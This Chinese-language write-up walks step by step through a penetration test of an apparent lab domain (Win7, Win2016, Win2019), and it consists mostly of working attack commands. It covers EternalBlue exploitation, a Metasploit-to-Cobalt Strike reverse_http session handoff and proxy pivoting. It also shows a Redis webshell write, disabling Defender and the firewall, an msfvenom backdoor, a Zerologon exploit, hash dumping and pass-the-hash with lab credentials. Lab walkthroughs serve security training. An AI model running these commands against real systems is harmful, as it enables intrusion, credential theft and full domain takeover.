记一次内网渗透过程

域主机（WIN2016）

内网1:10.0.20.99

内网2:10.0.10.111

Administrator/Admin@123、vulntarget.com\win2016/Admin#123

域控（WIN2019）

内网2：10.0.10.110

administrator/Admin@666

web服务器（WIN7）

内网ip：10.0.20.98

外网ip：192.168.0.107

攻击机

kali ip：192.168.1.11

1.信息收集

Nmap有四种基本功能：「端口扫描」、「主机探测」、「服务识别」和「系统识别」。

常见的信息收集

子域名查询  
whois信息收集
IP段的收集
开放端口探测
目录
指纹识别
旁站、C段
敏感文件、敏感目录探测
waf探测
整站分析：操作系统（Linux Windows) web容器（Apache Nginx Tomcat IIS ) 数据库 （mysql sqlserver access oracle） 脚本类型 （PHP jsp asp\aspx python）

1.1主机探测

nmap -sP 192.168.0.0/24

1.2服务探测

nmap -sV 192.168.0.0/24

拿到目标IP地址使用使用Nmap进行扫描，发现目标IP 10.192.0.107 系统开发135和445端口且探测出为Win7版本即可尝试使用永恒之蓝进行系统漏洞攻击

2.msf利用永恒之蓝

search ms17

use 0

show options

设置参数

set rhost 192.168.0.107
set lhost 192.168.0.135

查看是否有参数未设置

show missing

开始攻击run

进入win7

查看用户

getuid

已经最高权限，不需要提权，否则需要提权

进入shell交互，处理乱码

shell
chcp 65001

查看系统信息

systeminfo

查看到有内网IP 10.0.20.98

ipconfig /all

3.会话转移

msf转移cs，并添加监听

cs添加监听

从msf将session转移至cs

保留之前meterpreter会话bg，后面可能会用到

使用payload_inject模块

use exploit/windows/local/payload_inject
show options 

set payload windows/meterpreter/reverse_http #设置payload,为http
set disablepayloadhander true #设置当前msf不接受监听数据，转移后让cs接受监听数据
set lhost 192.168.0.135
set LPORT 5555
set seesion 2

执行run

run执行成功后，去cs查看目标上线

右键设置sleep 1

进入控制台interact

shell whoami 当前账号信息
shell systeminfo

扫描c段ip及重要端口

cs如何派生session给msf

msf拿到的session到一定时间会自动离线，这里直接可以在cs中重新派生session，不需要再从头到尾来一遍。

1.msf设置

用到监听模块handler，注意payload使用windows/meterpreter/reverse_http

use exploit/multi/handler
set lhost 0.0.0.0
set lport 6666
set payload windows/meterpreter/reverse_http
run #等待cs发送指令

2.cs监听设置

类型选 foreign http

3.派生会话

执行Spwan

4.内渗透Win2016

css设置

kali全局代理设置

进入session的meterpreter,设置路由

sessions -i 1

查看当前路由状态

run autoroute -p

建立路由

run autoroute -s 10.0.20.0/24

攻击机kali利用proxychains 配合Socks代理通信

vim /etc/proxychains4.conf

底部添加

socks4 127.0.0.1 9999

注意，这里配置sockets4

测试下代理转发是否生效，nmap 走 Socks 代理，

proxychains nmap -Pn -sT 10.0.20.99 -p6379、20、80、445、7001、3306

浏览器也可以测试，火狐设置代理

访问 http://10.0.20.99/

dirsearch目录扫描

安装相关依赖，当使用pip install -r requirements.txt安装依赖速度较慢时，可以选择一个速度快的国内镜像源，提高安装速度

阿里源
pip install -r requirements.txt -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com

或清华源
pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

扫描目录（注意挂代理）

python dirsearch.py -u "http://10.0.20.99/" --proxy=socks4://127.0.0.1:9999

直接访问http://10.0.20.99/l.php

直接访问http://10.0.20.99/phpinfo.php

这里主要是的得到绝对路径：C:/phpStudy/PHPTutorial/WWW/

reids 未授权漏洞及利用

连上去看6379的Redis端口是不是未授权

proxychains redis-cli -h 10.0.20.99

可以连，说明存在未授权，直接写入一个webshell或者反弹shell。

config set dir "C:/phpStudy/PHPTutorial/WWW/"
config set dbfilename shell.php
set xxx "\r\n\r\n<?php @eval($_REQUEST['c']);?>\r\n\r\n"
save

其他方式：或者利用gopher协议，这种通常是和ssrf漏洞结合。

直接远控，上蚁剑，需要先开启代理

添加数据

蚁剑成功连接，然后查看一下当前用户权限

这个也是system的权限

再次内网信息收集

quser查看一下运行中的用户

发现win2016用户在线

ipconfig /all

发现域名vulntarget.com以及另一个内网ip:10.0.10.111,然后再看一下进程tasklist

将进程复制到蚁剑插件中进行杀软识别，发现MsMpEng.exe <=> Windows Defender

关Windows Defender

连上之后，直接先关防火墙（可以先看看有没有防火墙）

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
 
gpupdate /force

手动关防火墙

netsh advfirewall show allprofiles # 查看防火墙配置
netSh advfirewall set allprofiles state off # 关闭防火墙

正向shell-msf拿下Win2016

生成木马，通过蚁剑上传

生成木马，通过蚁剑上传至10.0.20.99

在任意目录下执行命令，生成木马hacker.exe

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8881 -f exe -o hacker.exe

利用蚁剑上传文件

上传后运行该后门文件，执行后门文件，上线

由于这个是正向的webshell，msf需要监听的ip是内网的ip，注意这里要代理模式下启动msf

proxychains msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
set lport 8881
run

正向shell-cs拿下WIn2016

配置并启动tcp监听器,类型选Beacon Tcp

生成后门

通过蚁剑向Win2016 10.0.20.99上传后门并运行

通过Win7 10.0.20.98执行命令让win 2016连接cs监听， win2016成功上线cs

connect 10.0.20.99 7777

5.域渗透win2019

信息收集

通过蚁剑进入Win2016 10.0.20.99命令窗口

信息收集先找到域控——查看当前时间，通常情况时间服务器都是主域控。

拿到域名，直接ping得到域控ip 10.0.10.110

查找域控计算机名 WIN2019

设置代理

因为Win2016有10.0.10.111和域控在同一C段可以ping通域控，在win2016 的meterpreter里面去加路由。

cs设置Win2016代理转发端口

msf开启路由

配置代理文件

vim /etc/proxychains4.conf

漏洞利用

利用域控工具Zerologon漏洞探测，发现win2019存在Zerologon的漏洞

该漏洞是由于NetLogon（MS-NRPC）协议与AD域控建立安全通道时，可利用该漏洞将AD域控的计算机账号密码置为空，从而控制域控服务器。

下载poc：https://github.com/SecuraBV/CVE-2020-1472验证漏洞是否存在

下载exp：git clone https://github.com/dirkjanm/CVE-2020-1472

目的：置空密码

proxychains python cve-2020-1472-exploit.py WIN2019 10.0.10.110

python安装impacket包

下载impacket安装包：git clone https://github.com/CoreSecurity/impacket.git

proxychains python3 secretsdump.py vulntarget/win2019\$@10.0.10.110 -no-pass

拿到examples目录下的exp获取hash

利用工具smbexex.py 或 wmiexec.py横向移动，拿下域控

smbexex.py
proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

wmiexec.py
proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

成功拿下域控